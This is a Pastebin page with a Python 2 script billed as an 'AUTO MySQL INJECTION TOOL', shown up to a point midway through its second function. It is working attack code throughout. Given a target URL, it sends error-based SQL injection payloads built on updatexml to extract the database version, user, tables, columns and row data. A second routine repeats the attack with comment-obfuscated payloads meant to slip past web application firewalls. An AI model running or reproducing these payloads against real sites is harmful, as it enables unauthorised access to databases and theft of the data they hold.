Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!python
- # xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
- # x----------------------------------------------------------------------------------------------------x
- # x---------------------- AUTO MySQL INJECTION TOOL ---------------------------------------------------x
- # x---------------------------Coded By hAxOr -James* --------------------------------------------------x
- # x----------------------------------Security Is Just An ILLUSION -------------------------------------x
- # x-------------------------------------Fuck Hacking--------We Love 3xpl0iting ! ----------------------x
- # x----------------------------------------------------------------------------------------------------x
- # xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
- # --------------------------BEWARE--------------------------------------------------
- # Do Not Touch Or Change Anything!
- # Everything in this tool is highly Coded and has its own functions
- # Nothing will work if Changed or Removed !!
- # ----------------------------------------------------------------------------------
- import sys
- import re
- import time
- import os
- import codecs
- import urllib2
- import urllib
- str1 = 'User'
- userx = str1.encode('base64','strict')
- str2 = 'Pass'
- passx = str2.encode('base64','strict')
- fvkem = 'base64_decode("b3Muc3lzdGVtKCJjbHMiKQ0KCQl0aW1lLnNsZWVwKDEpDQoJCW9zLnN5c3RlbSgidGl0bGUgICAgICAtICAgICAgQWR2YW5jZWQgQXV0b21hdGljIE15U1FMIEluamVjdGlvbiBUb29sICAgICA6OiAgIENvZGVkIEJ5IEphbWVzICAgOjoiKQ0KCQl1c3ggPSAnQW5hcycNCgkJcHN4ID0gJ3RyJw0KCQlwcmludCAiXG4gICAgICAgIyMjICAgICAgICBQbGVhc2UgTG9naW4gVG8gQ29udGludWUgICAgICAgICAgIyMjXG4iICAgIi0iKjU1DQoJCXBvbCA9IHJhd19pbnB1dCgiICBFbnRlciBZb3VyIFVzZXJuYW1lIDogIikNCgkJcG9sMSA9IHJhd19pbnB1dCgiICBFbnRlciBZb3VyIFBhc3N3b3JkIDogIikNCgkJaWYocG9sICE9IHVzeCk6DQoJCQlwcmludCAiVXNlcm5hbWUgaXMgSW5jb3JyZWN0ISINCgkJCXRpbWUuc2xlZXAoMSkNCgkJCXN5cy5leGl0KDApDQoJCWlmKHBvbDEgIT0gcHN4KToNCgkJCXByaW50ICJQYXNzd29yZCBpcyBJbmNvcnJlY3QhIg0KCQkJdGltZS5zbGVlcCgxKQ0KCQkJc3lzLmV4aXQoMCkNCgkJYWNjKCk=")'
- def xpath_simple():
- time.sleep(.6)
- print "Enter Injection URL : For Example 'http://www.example.com/page.php?id=4'\n"
- print "\nIf the Injection Doesn't Work. Try For String Based \n(Add ' in the end of the URL)\nOr Try WAF Bypassed Version.\nOr Try Any other Method\n"
- ur = raw_input("Enter URL : ")
- print "\n Started Injecting\n Please Wait .. \n"
- xur = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,version()),0x3a)--+' % ur).read()
- pr = re.findall("XPATH syntax error: ':(.*)'",xur,re.MULTILINE)
- xur1 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,database()),0x3a)--+' % ur).read()
- pr1 = re.findall("XPATH syntax error: ':(.*)'",xur1,re.MULTILINE)
- xur2 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,user()),0x3a)--+' % ur).read()
- pr2 = re.findall("XPATH syntax error: ':(.*)'",xur2,re.MULTILINE)
- print "\nDatabase Version : "
- print pr
- print "\nDatabase Name : "
- print pr1
- print "\nDatabase User : "
- print pr2
- print "\n"
- xur3 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+table_name+from+information_Schema.tables+where+table_schema=database()+limit+0,1)),null)--+' % ur).read()
- pr3 = re.findall("XPATH syntax error: ':(.*)'",xur3)
- xur4 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+table_name+from+information_Schema.tables+where+table_schema=database()+limit+1,1)),null)--+' % ur).read()
- pr4 = re.findall("XPATH syntax error: ':(.*)'",xur4)
- xur5 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+table_name+from+information_Schema.tables+where+table_schema=database()+limit+2,1)),null)--+' % ur).read()
- pr5 = re.findall("XPATH syntax error: ':(.*)'",xur5)
- xur6 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+table_name+from+information_Schema.tables+where+table_schema=database()+limit+3,1)),null)--+' % ur).read()
- pr6 = re.findall("XPATH syntax error: ':(.*)'",xur6)
- xur7 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+table_name+from+information_Schema.tables+where+table_schema=database()+limit+4,1)),null)--+' % ur).read()
- pr7 = re.findall("XPATH syntax error: ':(.*)'",xur7)
- xur8 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+table_name+from+information_Schema.tables+where+table_schema=database()+limit+5,1)),null)--+' % ur).read()
- pr8 = re.findall("XPATH syntax error: ':(.*)'",xur8)
- xur9 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+table_name+from+information_Schema.tables+where+table_schema=database()+limit+6,1)),null)--+' % ur).read()
- pr9 = re.findall("XPATH syntax error: ':(.*)'",xur9)
- xur10 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+table_name+from+information_Schema.tables+where+table_schema=database()+limit+7,1)),null)--+' % ur).read()
- pr10 = re.findall("XPATH syntax error: ':(.*)'",xur10)
- xur11 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+table_name+from+information_Schema.tables+where+table_schema=database()+limit+8,1)),null)--+' % ur).read()
- pr11 = re.findall("XPATH syntax error: ':(.*)'",xur11)
- xur12 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+table_name+from+information_Schema.tables+where+table_schema=database()+limit+9,1)),null)--+' % ur).read()
- pr12 = re.findall("XPATH syntax error: ':(.*)'",xur12)
- xur13 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+table_name+from+information_Schema.tables+where+table_schema=database()+limit+10,1)),null)--+' % ur).read()
- pr13 = re.findall("XPATH syntax error: ':(.*)'",xur13)
- xur14 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+table_name+from+information_Schema.tables+where+table_schema=database()+limit+11,1)),null)--+' % ur).read()
- pr14 = re.findall("XPATH syntax error: ':(.*)'",xur14)
- xur15 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+table_name+from+information_Schema.tables+where+table_schema=database()+limit+12,1)),null)--+' % ur).read()
- pr15 = re.findall("XPATH syntax error: ':(.*)'",xur15)
- xur16 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+table_name+from+information_Schema.tables+where+table_schema=database()+limit+13,1)),null)--+' % ur).read()
- pr16 = re.findall("XPATH syntax error: ':(.*)'",xur16)
- xur17 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+table_name+from+information_Schema.tables+where+table_schema=database()+limit+14,1)),null)--+' % ur).read()
- pr17 = re.findall("XPATH syntax error: ':(.*)'",xur17)
- xur18 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+table_name+from+information_Schema.tables+where+table_schema=database()+limit+15,1)),null)--+' % ur).read()
- pr18 = re.findall("XPATH syntax error: ':(.*)'",xur18)
- xur19 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+table_name+from+information_Schema.tables+where+table_schema=database()+limit+16,1)),null)--+' % ur).read()
- pr19 = re.findall("XPATH syntax error: ':(.*)'",xur19)
- xur20 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+table_name+from+information_Schema.tables+where+table_schema=database()+limit+17,1)),null)--+' % ur).read()
- pr20 = re.findall("XPATH syntax error: ':(.*)'",xur20)
- xur21 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+table_name+from+information_Schema.tables+where+table_schema=database()+limit+18,1)),null)--+' % ur).read()
- pr21 = re.findall("XPATH syntax error: ':(.*)'",xur21)
- xur22 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+table_name+from+information_Schema.tables+where+table_schema=database()+limit+19,1)),null)--+' % ur).read()
- pr22 = re.findall("XPATH syntax error: ':(.*)'",xur22)
- xur23 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+table_name+from+information_Schema.tables+where+table_schema=database()+limit+20,1)),null)--+' % ur).read()
- pr23 = re.findall("XPATH syntax error: ':(.*)'",xur23)
- print "\nTables :"
- print pr3
- print pr4
- print pr5
- print pr6
- print pr7
- print pr8
- print pr9
- print pr10
- print pr11
- print pr12
- print pr13
- print pr14
- print pr15
- print pr16
- print pr17
- print pr18
- print pr19
- print pr20
- print pr21
- print pr22
- print pr23
- print "\n\n"
- xpcol = raw_input("Enter The Name Of Table to Grab Columns :")
- xpcol1 = xpcol.encode("hex")
- xur24 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+column_name+from+information_Schema.columns+where+table_name=0x%s+limit+0,1)),null)--+' % ( ur, xpcol1)).read()
- pr24 = re.findall("XPATH syntax error: ':(.*)'",xur24)
- xur25 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+column_name+from+information_Schema.columns+where+table_name=0x%s+limit+1,1)),null)--+' % ( ur, xpcol1)).read()
- pr25 = re.findall("XPATH syntax error: ':(.*)'",xur25)
- xur26 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+column_name+from+information_Schema.columns+where+table_name=0x%s+limit+2,1)),null)--+' % ( ur, xpcol1)).read()
- pr26 = re.findall("XPATH syntax error: ':(.*)'",xur26)
- xur27 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+column_name+from+information_Schema.columns+where+table_name=0x%s+limit+3,1)),null)--+' % ( ur, xpcol1)).read()
- pr27 = re.findall("XPATH syntax error: ':(.*)'",xur27)
- xur28 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+column_name+from+information_Schema.columns+where+table_name=0x%s+limit+4,1)),null)--+' % ( ur, xpcol1)).read()
- pr28 = re.findall("XPATH syntax error: ':(.*)'",xur28)
- xur29 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+column_name+from+information_Schema.columns+where+table_name=0x%s+limit+5,1)),null)--+' % ( ur, xpcol1)).read()
- pr29 = re.findall("XPATH syntax error: ':(.*)'",xur29)
- xur30 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+column_name+from+information_Schema.columns+where+table_name=0x%s+limit+6,1)),null)--+' % ( ur, xpcol1)).read()
- pr30 = re.findall("XPATH syntax error: ':(.*)'",xur30)
- xur31 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+column_name+from+information_Schema.columns+where+table_name=0x%s+limit+7,1)),null)--+' % ( ur, xpcol1)).read()
- pr31 = re.findall("XPATH syntax error: ':(.*)'",xur31)
- xur32 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+column_name+from+information_Schema.columns+where+table_name=0x%s+limit+8,1)),null)--+' % ( ur, xpcol1)).read()
- pr32 = re.findall("XPATH syntax error: ':(.*)'",xur32)
- xur33 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+column_name+from+information_Schema.columns+where+table_name=0x%s+limit+9,1)),null)--+' % ( ur, xpcol1)).read()
- pr33 = re.findall("XPATH syntax error: ':(.*)'",xur33)
- xur34 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+column_name+from+information_Schema.columns+where+table_name=0x%s+limit+10,1)),null)--+' % ( ur, xpcol1)).read()
- pr34 = re.findall("XPATH syntax error: ':(.*)'",xur34)
- xur35 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+column_name+from+information_Schema.columns+where+table_name=0x%s+limit+11,1)),null)--+' % ( ur, xpcol1)).read()
- pr35 = re.findall("XPATH syntax error: ':(.*)'",xur35)
- xur36 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+column_name+from+information_Schema.columns+where+table_name=0x%s+limit+12,1)),null)--+' % ( ur, xpcol1)).read()
- pr36 = re.findall("XPATH syntax error: ':(.*)'",xur36)
- xur37 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+column_name+from+information_Schema.columns+where+table_name=0x%s+limit+13,1)),null)--+' % ( ur, xpcol1)).read()
- pr37 = re.findall("XPATH syntax error: ':(.*)'",xur37)
- xur38 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+column_name+from+information_Schema.columns+where+table_name=0x%s+limit+14,1)),null)--+' % ( ur, xpcol1)).read()
- pr38 = re.findall("XPATH syntax error: ':(.*)'",xur38)
- print "\nColumns : "
- print pr24
- print pr25
- print pr26
- print pr27
- print pr28
- print pr29
- print pr30
- print pr31
- print pr32
- print pr33
- print pr34
- print pr35
- print pr36
- print pr37
- print pr38
- print "\n Note : If you don't want any column just leave it empty :)\n"
- xpdt = raw_input("Enter First Column Name : ")
- xpdt1 = raw_input("Enter Second Column Name : ")
- xpdt2 = raw_input("Enter Third Column Name : ")
- xpdt3 = raw_input("Enter Fourth Column Name : ")
- xpdt4 = raw_input("Enter Fifth Column Name : ")
- xur39 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+%s+from+%s+limit+0,1)),null)--+' % ( ur, xpdt, xpcol)).read()
- pr39 = re.findall("XPATH syntax error: ':(.*)'",xur39)
- xur40 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+%s+from+%s+limit+0,1)),null)--+' % ( ur, xpdt1, xpcol)).read()
- pr40 = re.findall("XPATH syntax error: ':(.*)'",xur40)
- xur41 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+%s+from+%s+limit+0,1)),null)--+' % ( ur, xpdt2, xpcol)).read()
- pr41 = re.findall("XPATH syntax error: ':(.*)'",xur41)
- xur42 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+%s+from+%s+limit+0,1)),null)--+' % ( ur, xpdt3, xpcol)).read()
- pr42 = re.findall("XPATH syntax error: ':(.*)'",xur42)
- xur43 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+%s+from+%s+limit+0,1)),null)--+' % ( ur, xpdt4, xpcol)).read()
- pr43 = re.findall("XPATH syntax error: ':(.*)'",xur43)
- print "\n\nFirst Column Result : "
- print pr39
- print "\nSecond Column Result : "
- print pr40
- print "\nThird Column Result : "
- print pr41
- print "\nFourth Column Result : "
- print pr42
- print "\nFifth Column Result : "
- print pr43
- print "\n\n All Processes Done!\n Turning Off All Functions!"
- time.sleep(1)
- print "Press Enter To Exit.."
- def xpath_waf():
- time.sleep(.6)
- print "Enter Injection URL : For Example 'http://www.example.com/page.php?id=4'\n"
- print "\nIf the Injection Doesn't Work. Try For String Based \n(Add ' in the end of the URL)\nOr Try WAF Bypassed Version.\nOr Try Any other Method\n"
- wfur = raw_input("Enter URL : ")
- print "\n Started Injecting\n Please Wait .. \n"
- time.sleep(2.5)
- print " WAF Killed The Injection Process !!\n Bypassing This Shit!\n"
- wfxur = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,version())*/,0x3a)--+' % wfur).read()
- wfpr = re.findall("XPATH syntax error: ':(.*)'",wfxur,re.MULTILINE)
- wfxur1 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,database())*/,0x3a)--+' % wfur).read()
- wfpr1 = re.findall("XPATH syntax error: ':(.*)'",wfxur1,re.MULTILINE)
- wfxur2 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,user())*/,0x3a)--+' % wfur).read()
- wfpr2 = re.findall("XPATH syntax error: ':(.*)'",wfxur2,re.MULTILINE)
- wfxur3 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!table_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/tables+where+table_schema=database()+limit+0,1)),null)--+' % wfur).read()
- wfpr3 = re.findall("XPATH syntax error: ':(.*)'",wfxur3)
- wfxur4 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!table_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/tables+where+table_schema=database()+limit+1,1)),null)--+' % wfur).read()
- wfpr4 = re.findall("XPATH syntax error: ':(.*)'",wfxur4)
- wfxur5 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!table_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/tables+where+table_schema=database()+limit+2,1)),null)--+' % wfur).read()
- wfpr5 = re.findall("XPATH syntax error: ':(.*)'",wfxur5)
- wfxur6 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!table_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/tables+where+table_schema=database()+limit+3,1)),null)--+' % wfur).read()
- wfpr6 = re.findall("XPATH syntax error: ':(.*)'",wfxur6)
- wfxur7 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!table_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/tables+where+table_schema=database()+limit+4,1)),null)--+' % wfur).read()
- wfpr7 = re.findall("XPATH syntax error: ':(.*)'",wfxur7)
- wfxur8 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!table_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/tables+where+table_schema=database()+limit+5,1)),null)--+' % wfur).read()
- wfpr8 = re.findall("XPATH syntax error: ':(.*)'",wfxur8)
- wfxur9 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!table_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/tables+where+table_schema=database()+limit+6,1)),null)--+' % wfur).read()
- wfpr9 = re.findall("XPATH syntax error: ':(.*)'",wfxur9)
- wfxur10 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!table_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/tables+where+table_schema=database()+limit+7,1)),null)--+' % wfur).read()
- wfpr10 = re.findall("XPATH syntax error: ':(.*)'",wfxur10)
- wfxur11 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!table_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/tables+where+table_schema=database()+limit+8,1)),null)--+' % wfur).read()
- wfpr11 = re.findall("XPATH syntax error: ':(.*)'",wfxur11)
- wfxur12 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!table_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/tables+where+table_schema=database()+limit+9,1)),null)--+' % wfur).read()
- wfpr12 = re.findall("XPATH syntax error: ':(.*)'",wfxur12)
- wfxur13 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!table_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/tables+where+table_schema=database()+limit+10,1)),null)--+' % wfur).read()
- wfpr13 = re.findall("XPATH syntax error: ':(.*)'",wfxur13)
- wfxur14 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!table_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/tables+where+table_schema=database()+limit+11,1)),null)--+' % wfur).read()
- wfpr14 = re.findall("XPATH syntax error: ':(.*)'",wfxur14)
- wfxur15 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!table_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/tables+where+table_schema=database()+limit+12,1)),null)--+' % wfur).read()
- wfpr15 = re.findall("XPATH syntax error: ':(.*)'",wfxur15)
- wfxur16 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!table_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/tables+where+table_schema=database()+limit+13,1)),null)--+' % wfur).read()
- wfpr16 = re.findall("XPATH syntax error: ':(.*)'",wfxur16)
- wfxur17 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!table_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/tables+where+table_schema=database()+limit+14,1)),null)--+' % wfur).read()
- wfpr17 = re.findall("XPATH syntax error: ':(.*)'",wfxur17)
- wfxur18 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!table_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/tables+where+table_schema=database()+limit+15,1)),null)--+' % wfur).read()
- wfpr18 = re.findall("XPATH syntax error: ':(.*)'",wfxur18)
- wfxur19 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!table_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/tables+where+table_schema=database()+limit+16,1)),null)--+' % wfur).read()
- wfpr19 = re.findall("XPATH syntax error: ':(.*)'",wfxur19)
- wfxur20 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!table_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/tables+where+table_schema=database()+limit+17,1)),null)--+' % wfur).read()
- wfpr20 = re.findall("XPATH syntax error: ':(.*)'",wfxur20)
- wfxur21 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!table_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/tables+where+table_schema=database()+limit+18,1)),null)--+' % wfur).read()
- wfpr21 = re.findall("XPATH syntax error: ':(.*)'",wfxur21)
- wfxur22 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!table_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/tables+where+table_schema=database()+limit+19,1)),null)--+' % wfur).read()
- wfpr22 = re.findall("XPATH syntax error: ':(.*)'",wfxur22)
- wfxur23 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!table_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/tables+where+table_schema=database()+limit+20,1)),null)--+' % wfur).read()
- wfpr23 = re.findall("XPATH syntax error: ':(.*)'",wfxur23)
- print "\nDatabase Version : "
- print wfpr
- print "\nDatabase Name : "
- print wfpr1
- print "\nDatabase User : "
- print wfpr2
- print "\nTables :"
- print wfpr3
- print wfpr4
- print wfpr5
- print wfpr6
- print wfpr7
- print wfpr8
- print wfpr9
- print wfpr10
- print wfpr11
- print wfpr12
- print wfpr13
- print wfpr14
- print wfpr15
- print wfpr16
- print wfpr17
- print wfpr18
- print wfpr19
- print wfpr20
- print wfpr21
- print wfpr22
- print wfpr23
- print "\n\n"
- wfxpcol = raw_input("Enter The Name Of Table to Grab Columns :")
- wfxpcol1 = wfxpcol.encode("hex")
- wfxur24 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!column_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/columns+where+table_name=0x%s+limit+0,1)),0x3a)--+' % ( wfur, wfxpcol1)).read()
- wfpr24 = re.findall("XPATH syntax error: ':(.*)'",wfxur24)
- wfxur25 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!column_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/columns+where+table_name=0x%s+limit+1,1)),0x3a)--+' % ( wfur, wfxpcol1)).read()
- wfpr25 = re.findall("XPATH syntax error: ':(.*)'",wfxur25)
- wfxur26 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!column_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/columns+where+table_name=0x%s+limit+2,1)),0x3a)--+' % ( wfur, wfxpcol1)).read()
- wfpr26 = re.findall("XPATH syntax error: ':(.*)'",wfxur26)
- wfxur27 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!column_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/columns+where+table_name=0x%s+limit+3,1)),0x3a)--+' % ( wfur, wfxpcol1)).read()
- wfpr27 = re.findall("XPATH syntax error: ':(.*)'",wfxur27)
- wfxur28 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!column_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/columns+where+table_name=0x%s+limit+4,1)),0x3a)--+' % ( wfur, wfxpcol1)).read()
- wfpr28 = re.findall("XPATH syntax error: ':(.*)'",wfxur28)
- wfxur29 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!column_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/columns+where+table_name=0x%s+limit+5,1)),0x3a)--+' % ( wfur, wfxpcol1)).read()
- wfpr29 = re.findall("XPATH syntax error: ':(.*)'",wfxur29)
- wfxur30 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!column_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/columns+where+table_name=0x%s+limit+6,1)),0x3a)--+' % ( wfur, wfxpcol1)).read()
- wfpr30 = re.findall("XPATH syntax error: ':(.*)'",wfxur30)
- wfxur31 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!column_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/columns+where+table_name=0x%s+limit+7,1)),0x3a)--+' % ( wfur, wfxpcol1)).read()
- wfpr31 = re.findall("XPATH syntax error: ':(.*)'",wfxur31)
- wfxur32 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!column_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/columns+where+table_name=0x%s+limit+8,1)),0x3a)--+' % ( wfur, wfxpcol1)).read()
- wfpr32 = re.findall("XPATH syntax error: ':(.*)'",wfxur32)
- wfxur33 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!column_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/columns+where+table_name=0x%s+limit+9,1)),0x3a)--+' % ( wfur, wfxpcol1)).read()
- wfpr33 = re.findall("XPATH syntax error: ':(.*)'",wfxur33)
- wfxur34 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!column_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/columns+where+table_name=0x%s+limit+10,1)),0x3a)--+' % ( wfur, wfxpcol1)).read()
- wfpr34 = re.findall("XPATH syntax error: ':(.*)'",wfxur34)
- wfxur35 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!column_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/columns+where+table_name=0x%s+limit+11,1)),0x3a)--+' % ( wfur, wfxpcol1)).read()
- wfpr35 = re.findall("XPATH syntax error: ':(.*)'",wfxur35)
- wfxur36 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!column_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/columns+where+table_name=0x%s+limit+12,1)),0x3a)--+' % ( wfur, wfxpcol1)).read()
- wfpr36 = re.findall("XPATH syntax error: ':(.*)'",wfxur36)
- wfxur37 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!column_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/columns+where+table_name=0x%s+limit+13,1)),0x3a)--+' % ( wfur, wfxpcol1)).read()
- wfpr37 = re.findall("XPATH syntax error: ':(.*)'",wfxur37)
- wfxur38 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!column_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/columns+where+table_name=0x%s+limit+14,1)),0x3a)--+' % ( wfur, wfxpcol1)).read()
- wfpr38 = re.findall("XPATH syntax error: ':(.*)'",wfxur38)
- print "\nColumns : "
- print wfpr24
- print wfpr25
- print wfpr26
- print wfpr27
- print wfpr28
- print wfpr29
- print wfpr30
- print wfpr31
- print wfpr32
- print wfpr33
- print wfpr34
- print wfpr35
- print wfpr36
- print wfpr37
- print wfpr38
- print "\n Note : If you don't want any column just leave it empty :)\n"
- wfxpdt = raw_input("Enter First Column Name : ")
- wfxpdt1 = raw_input("Enter Second Column Name : ")
- wfxpdt2 = raw_input("Enter Third Column Name : ")
- wfxpdt3 = raw_input("Enter Fourth Column Name : ")
- wfxpdt4 = raw_input("Enter Fifth Column Name : ")
- wfxur39 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!%s*/+/*!from*/+%s+limit+0,1)),0x3a)--+' % ( wfur, wfxpdt, wfxpcol)).read()
- wfpr39 = re.findall("XPATH syntax error: ':(.*)'",wfxur39)
- wfxur40 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!%s*/+/*!from*/+%s+limit+0,1)),0x3a)--+' % ( wfur, wfxpdt1, wfxpcol)).read()
